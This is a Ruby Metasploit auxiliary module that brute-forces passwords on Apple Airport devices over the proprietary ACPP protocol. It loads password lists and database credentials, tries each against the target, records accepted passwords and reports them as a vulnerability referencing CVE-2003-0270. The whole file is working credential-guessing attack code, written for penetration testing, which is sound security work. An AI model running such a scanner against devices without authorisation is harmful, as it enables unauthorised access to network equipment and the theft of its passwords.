##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/acpp'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Auxiliary scanner that sweeps Apple Airport devices for accepted ACPP
  # passwords. ACPP is password-only (no username), so the username-oriented
  # AuthBrute options are removed in #initialize. Each accepted password is
  # additionally reported as a vuln, since the module's reference
  # (CVE-2003-0270) concerns the fixed XOR key the protocol uses for the
  # password.
  def initialize
    super(
      'Name' => 'Apple Airport ACPP Authentication Scanner',
      'Description' => %q{
        This module attempts to authenticate to an Apple Airport using its
        proprietary and largely undocumented protocol known only as ACPP.
      },
      'Author' => [
        'Jon Hart <jon_hart[at]rapid7.com>'
      ],
      'References' => [
        %w[CVE 2003-0270] # Fixed XOR key used to encrypt password
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    )

    register_options(
      [
        Opt::RPORT(Rex::Proto::ACPP::DEFAULT_PORT)
      ]
    )

    # ACPP has no notion of a username, so none of the user-related
    # AuthBrute options apply to this module.
    deregister_options(
      'DB_ALL_USERS',
      'DB_ALL_CREDS',
      'DB_SKIP_EXISTING',
      'USERNAME',
      'USERPASS_FILE',
      'USER_FILE',
      'USER_AS_PASS'
    )

    register_autofilter_ports([Rex::Proto::ACPP::DEFAULT_PORT])
  end

  # Runs the password sweep against a single host and records every result.
  #
  # @param ip [String] target address handed over by the Scanner mixin
  # @return [void]
  def run_host(ip)
    vprint_status("#{ip}:#{rport} - Starting ACPP login sweep")

    login_scanner = build_login_scanner(ip, build_cred_collection)

    login_scanner.scan! do |result|
      record_result(ip, result)
    end
  end

  private

  # Builds the password-only credential set from the datastore and lets
  # AuthBrute prepend any passwords already held in the database.
  #
  # @return [Metasploit::Framework::PrivateCredentialCollection]
  def build_cred_collection
    collection = Metasploit::Framework::PrivateCredentialCollection.new(
      blank_passwords: datastore['BLANK_PASSWORDS'],
      pass_file: datastore['PASS_FILE'],
      password: datastore['PASSWORD']
    )
    prepend_db_passwords(collection)
  end

  # Configures an ACPP login scanner for +ip+ from the module datastore
  # (transport, timing, SSL and local-bind settings).
  #
  # @param ip [String] target address
  # @param cred_collection [Metasploit::Framework::PrivateCredentialCollection]
  # @return [Metasploit::Framework::LoginScanner::ACPP]
  def build_login_scanner(ip, cred_collection)
    settings = configure_login_scanner(
      host: ip,
      port: rport,
      proxies: datastore['PROXIES'],
      cred_details: cred_collection,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: datastore['ConnectTimeout'],
      max_send_size: datastore['TCP::max_send_size'],
      send_delay: datastore['TCP::send_delay'],
      framework: framework,
      framework_module: self,
      ssl: datastore['SSL'],
      ssl_version: datastore['SSLVersion'],
      ssl_verify_mode: datastore['SSLVerifyMode'],
      ssl_cipher: datastore['SSLCipher'],
      local_port: datastore['CPORT'],
      local_host: datastore['CHOST']
    )
    Metasploit::Framework::LoginScanner::ACPP.new(settings)
  end

  # Persists one scan result. A successful login is stored as a credential
  # core plus login and reported as a vuln; a failed attempt is invalidated
  # so the same password is not retried against this service.
  #
  # @param ip [String] target address
  # @param result [Metasploit::Framework::LoginScanner::Result]
  # @return [void]
  def record_result(ip, result)
    cred_data = result.to_h.merge(
      module_fullname: fullname,
      workspace_id: myworkspace_id
    )
    secret = result.credential.private

    unless result.success?
      invalidate_login(cred_data)
      vprint_error("#{ip}:#{rport} - ACPP LOGIN FAILED: #{secret} (#{result.status}: #{result.proof})")
      return
    end

    cred_data[:core] = create_credential(cred_data)
    create_credential_login(cred_data)
    print_good("#{ip}:#{rport} - ACPP Login Successful: #{secret}")
    report_vuln(
      host: ip,
      port: rport,
      proto: 'tcp',
      name: 'Fixed XOR key used to encrypt passwords',
      info: "Successful authentication with '#{secret}'",
      refs: references
    )
  end
end